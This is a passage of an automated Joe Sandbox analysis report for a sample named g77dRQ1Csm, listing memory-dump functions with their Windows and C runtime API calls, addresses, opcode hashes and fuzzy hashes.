                                                                                                                                                                                                                              • API String ID: 876702719-0
                                                                                                                                                                                                                              • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,03166BF7,00000001,00000001,?), ref: 03166A00
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,03166BF7,00000001,00000001,?,?,?,?), ref: 03166A86
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 03166B80
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 03166B8D
                                                                                                                                                                                                                                • Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 03166B96
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 03166BBB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                              • Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                                                                                              • Instruction ID: fd2a703e11db90419050bf20de73c7f823911859457d5a6baf8d7b15b709832a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA519272710216EFDB25CFA4CC41EABB7AAEB49760F19466DFD05DB140DB34EC6086A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                              • Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                                                                                              • Instruction ID: 78afb9a7092774925b384f2e851452c8039e785f647f6e3213932bec2198dc10
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80512776900305BBDF25DBE98C44EAEB7ADEF4D364F18463AF814DA181DB31D5708AA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                              • Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                                                                                              • Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0315CC19,0315A4C2), ref: 0315CC30
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0315CC3E
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0315CC57
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0315CC19,0315A4C2), ref: 0315CCA9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                                                                                              • Instruction ID: 599d0718d56569637e5da659c04e5cb409281f0a003d17b66ebeaaf576d5c892
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86012836249311DFE729EFB87D889672758EB09B72720023DF934841F0EF51482082C4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
                                                                                                                                                                                                                              • Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction ID: b85522fc53cd07a322269044c06a7b73ca1c287efd3c3493e4de6230c7985484
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF0F43A24870127D222E3F96C28B6B251D9BCD775F2904A4F825DA2D0EF218C324169
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID: -@
                                                                                                                                                                                                                              • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                              • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 03151B30
                                                                                                                                                                                                                              • std::system_error::system_error.LIBCPMT ref: 03151B3F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                              • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                              • Instruction ID: 4fbd6435bde049f06d443cefe4c8ce2049c96c4c8f56e11221566dc576ffe827
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAF0F67590036DF7CF12EB908C40FD97BA89F0D690F15C436FD646A180E7B5594482E8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                              • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                              • Opcode ID: 75ed6e1c9f85c34b315a64263d297d3b47a73d9cda343acb434d8109098bbaba
                                                                                                                                                                                                                              • Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ed6e1c9f85c34b315a64263d297d3b47a73d9cda343acb434d8109098bbaba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                                                                                              • Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction ID: 1f5165a23e484d5293771845d9d4cefce521ac2b0d6e6fbd51f60ee67991cd0c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D971AFB1E002169FCB25CFD8CC84ABEBB79FF49361F184269E91177141DB7099A1CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction ID: 9cdba3c183a8c5a1ee5ff899a3dd193f4097d9371180865c746c305fa0465b3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E41C136A003009FCB14DFB8C880A5DB7B6EF8E714B1945A9E555EF290DB71E911CB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0041B385
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0041B3F1
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 313313983-0
                                                                                                                                                                                                                              • Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                                                                                              • Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0316E673
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0316E696
                                                                                                                                                                                                                                • Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0316E6BC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316E6CF
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0316E6DE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                              • Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                                                                                              • Instruction ID: b77a4da82b54e333e9f505da7ef465c47763829ec69a064929e73d939640d3a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF01D47A6013157B233196F65D8CC7BBA6CDACAEA0B190239FD04D6140DF618C22C1B9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041E468
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                              • Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                                                                                              • Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,031625ED,03167307,?,03166FAE,00000001,00000364,?,0315E697,?,?,?,0315ED94,?), ref: 03167009
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316703E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03167065
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 03167072
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0316707B
                                                                                                                                                                                                                              Memory Dump Source
